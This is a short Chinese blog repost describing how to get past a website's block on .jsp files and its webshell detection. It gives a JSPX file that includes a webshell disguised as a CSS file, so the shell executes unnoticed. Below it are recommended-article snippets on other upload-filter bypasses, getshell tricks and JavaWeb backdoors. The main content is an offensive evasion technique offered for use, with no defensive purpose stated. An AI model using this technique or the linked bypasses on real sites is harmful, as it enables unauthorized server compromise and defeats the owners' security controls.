记一次对上传对jsp限制的绕过

最新推荐文章于 2023-02-16 18:31:31 发布
最新推荐文章于 2023-02-16 18:31:31 发布
阅读量2.2k 收藏
点赞数
文章标签: java xhtml 前端 ViewUI
原文链接:http://www.cnblogs.com/kankanhua/p/6086998.html
版权

当访问网站任何.jsp后缀的文件时都会显示如下图所示或者session timeout等提示,

并且网站防护会,对上传大马和一句话会被查杀。

解决方法:

利用jspx包含,利用jspx包含图片或者css等可以绕过防护,demo_table_util.css是大马文件。

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="utf-8"/>
    <jsp:directive.page import="java.io.*"/>
    <jsp:directive.page import="java.util.*"/>
    <jsp:directive.page import="javax.servlet.*"/>
    <jsp:directive.page import="javax.servlet.http.*"/>

  <jsp:directive.include file="../css/demo_table_util.css" />


</jsp:root>

 

转载于:https://www.cnblogs.com/kankanhua/p/6086998.html

weixin_34290390
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
帆软报表绕过各种限制getshell.pdf
04-22
/test/1.jsp`)来绕过访问限制,成功访问Shell。 #### 三、总结 通过对帆软报表系统的安全机制进行深入研究和实践,我们不仅可以了解该系统存在的安全漏洞及其利用方法,还能从中学习到如何有效地绕过各种安全限制...
jsp文件上传_原创 | 绕过后缀安全检查进行文件上传
weixin_39767645的博客
11-25 3429
点击上方蓝字 关注我吧引言文件上传是web中比较常见的业务,例如上传头像、简历等。当前也有很多开源工具包进行辅助实现,例如Apache Commons FileUpload、Jfinal cos等。但是若在开发过程中没有做好相关的安全防护,攻击者可以通过上传恶意脚本来获取系统权限。对上传文件后缀名进行白名单限制也是比较简单有效的方式。以下是实际业务中发现的一处绕过后缀安全检查进行文件...
文件上传绕过】三、黑名单不全绕过
ssrf
10-10 1647
文章目录一、描述二、实验原理三、检测代码四、添加黑名单中未做限制的后缀进行绕过 一、描述 Web系统可能会采用黑名单的方式进行过滤。而过滤的方式存在一定的缺陷,比如存在过滤的黑名单不全,未考虑大小写,以及对上传文件名单次进行敏感字符清除。 二、实验原理 当下流行的网站开发语言均存在多个可解析后缀,例如asp脚本语言的可解析后缀,不仅仅是.asp,还有.cer,.asa等等。而由于开发人员相关知识或安全意识的局限性(欠缺),导致设置的黑名单不全。这时就可以通过其他可解析后缀绕过黑名单上传可执行的websh
上传验证绕过——服务端黑名单绕过
Williamanddog的博客
01-28 911
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。由于.htaccess还是没有过滤,可以重写文件解析规则绕过上传一个 .htaccess,文件内容如下,意思。Upload-labs(Pass-03)根据源码可以看出,只是做了个简单的后缀名黑名单,识别上传文件的类型是。否为 '.asp','.aspx','.php','.jsp' 中的一个,若是其中的一个,则不允许上传。这一关的思路是它没有循环验证,也就是说这些首尾去空,删除末尾的点,去除字符串:$SDATA,转换。
攻击JavaWeb应用[8]-后门篇
Exploit的小站~
03-27 2071
0x00 背景 关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享几种比较有意思的JavaWeb后门给大家玩。 0x01 jspx后门 在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat的配置文件的时候看到jspjspx都是由org.apache
拦截器实现文件过滤(JSP)
收集盒 Book box
09-12 1035
上面手动实现文件过滤的方式虽然简单,但毕竟需要书写大量的过滤代码,不利于程序的高层次解构,而且开发复杂。 Struts 2提供了一个文件上传的拦截器,通过配置该拦截器可以更轻松地实现文件过滤。Struts 2中文件上传的拦截器是fileUpload,为了让该拦截器起作用,只需要在该Action中配置该拦截器引用即可。 配置fileUpload拦截器时,可以为其指定两个参数。 Ø  allow
JSP使用ckeditor和ckfinder实现富文本及文件上传
09-24
在IT行业中,JSPJavaServer Pages)是一...以上是关于"JSP使用ckeditor和ckfinder实现富文本及文件上传"这一主题的详细解释,希望对你有所帮助。在实际开发中,你还需要结合具体的代码示例和项目需求来进行实践操作。
jspsmart实现文件上传下载jspSmartUploadjar下载文库.pdf
11-04
- 然而,仅限制扩展名并不完全安全,还需要检查文件内容和MIME类型,以防止通过更改扩展名绕过限制。 6. **数据库交互**: - 示例代码中还涉及到数据库操作,使用了 `java.sql.*` 和自定义的数据库管理类 `DBstep....
jsp+ajax实现无刷新上传文件的方法.docx
01-20
本案例采用的是将文件上传表单提交到一个隐藏的`iframe`中,通过这种方式绕过浏览器的安全限制,同时利用Ajax来处理上传完成后的响应结果。 #### 关键步骤详解 1. **页面结构准备** 首先,在列表页`select...
SAE云服务安全沙箱绕过2(利用crackClassLoader)1
08-08
在本文中,我们将深入探讨如何利用Java沙箱中的一个漏洞——crackClassLoader,来绕过SAE的安全沙箱限制。 沙箱是一种安全机制,用于限制应用程序的执行权限,防止它们执行可能破坏系统或数据的操作。在SAE环境中,...
JAVA文件上传防止篡改后缀名
Ansee
05-23 1840
一次小技巧: 我们在做文件上传时会对比文件得后缀名比如.txt,但是假如用户恶意将其他格式得文件通过修改后缀名改为txt上传,则大大影响安全。 所以可通过文件得字节码判断文件得真实类型。 1.定义一下文件头的字节码: //文件的字节码头 public enum FileType { /** * JEPG. */ JPEG("FFD8FF"), /** * PNG. */ PNG("89504E47"),
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 3007
我相信,你在开发Web应用时,后端一定会提供文件上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
文件上传下载以及如何防止网站被入侵(web开发中很有用的知识)
escdelete的专栏
03-11 4024
文件上传:允许客户将本地文件上传到服务器端  应用:上传照片、上传新闻图片、上传附件  一、文件上传编程 1、在用户页面中添加上传输入项 (客户端页面操作) 注意事项: 1) 必须为文件上传input 提供name属性,否则文件上传内容不会被表单提交  2) 表单的提交是post (get提交数据在url地址上显示,有长度限制)  3) 设置enctype=multip
Tomcat部署程序避免jsp木马攻击
SJZYLC的专栏
04-07 2537
JSP的本质是servlet,当外面攻击者将jsp文件上传到程序目录下,就能通过访问jsp文件进行服务攻击,可以通过程序避免jsp文件上传。 如果jsp文件已经上传上去,可以避免jsp文件被直接访问,思路是通过servlet对*.jsp、*.jspx文件进行过滤,核心代码如下: Servlet文件: Object flag = request.getAttribute("org.apach...
java 图片上传jsp_java问题用java代码在后台如何将jsp页面上的图片上传(是 爱问知识人...
weixin_30140707的博客
02-28 82
先到apache官方下载common-upload组件上传// 新建一个SmartUpload对象SmartUpload su = new SmartUpload();// 上传初始化itialize(pageContext);// 限制每个上传文件的最大长度。tMaxFileSize(10000);// 限制上传数据的长度。tTotalMaxFileSize(20000);// 设定允许上传的...
文件上传的漏洞介绍及常见防御方法V1.0
最新发布
qq_49849300的博客
02-16 3079
if (file==null||file==""){ alert("请选择要上传文件");
基于JavaJSP文件上传下载
小滕的Java学习旅途
02-15 1718
当用户在前端页面点击文件上传后,用户上传文件数据提交给服务器端,实现保存
java防止上传恶意文件_从补丁分析到在野利用:揭秘CVE20201464 Windows文件签名验证绕过漏洞疑云...
weixin_39788131的博客
12-26 546
背景2020年8月12日,微软发布了8月份的漏洞风险通告。通告中一个显示已被公开披露和在野利用的漏洞进入了我们的视野。该漏洞编号为CVE-2020-1464,其被描述为Windows验证文件数字签名时存在一个欺骗漏洞,攻击者若成功利用此漏洞可以绕过Windows数字签名安全验证并加载执行未正确签名的恶意文件。而在真实攻击情形中,攻击者利用该漏洞可能会绕过防止加载未正确签名文件的安全软件(...
JavaWeb作业--Jsp文件上传(限制文件后缀名)
zy6648的博客
04-11 3041
upload.jsp 文件上传 选择一个文件: upload.java package abc; import java.io.*; import java.util.*; import javax.servlet.ServletException; import javax.servlet.annotation.WebS
Web安全入门:绕过上传限制策略分析
为了绕过白名单,我们可以先上传一个合法的文件(如.jpg),然后在抓包工具Burp Suite中修改文件后缀为.php。由于验证发生在前端JavaScript,禁用JS或者直接在浏览器中修改请求也能达到同样的效果。 **PASS2--...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值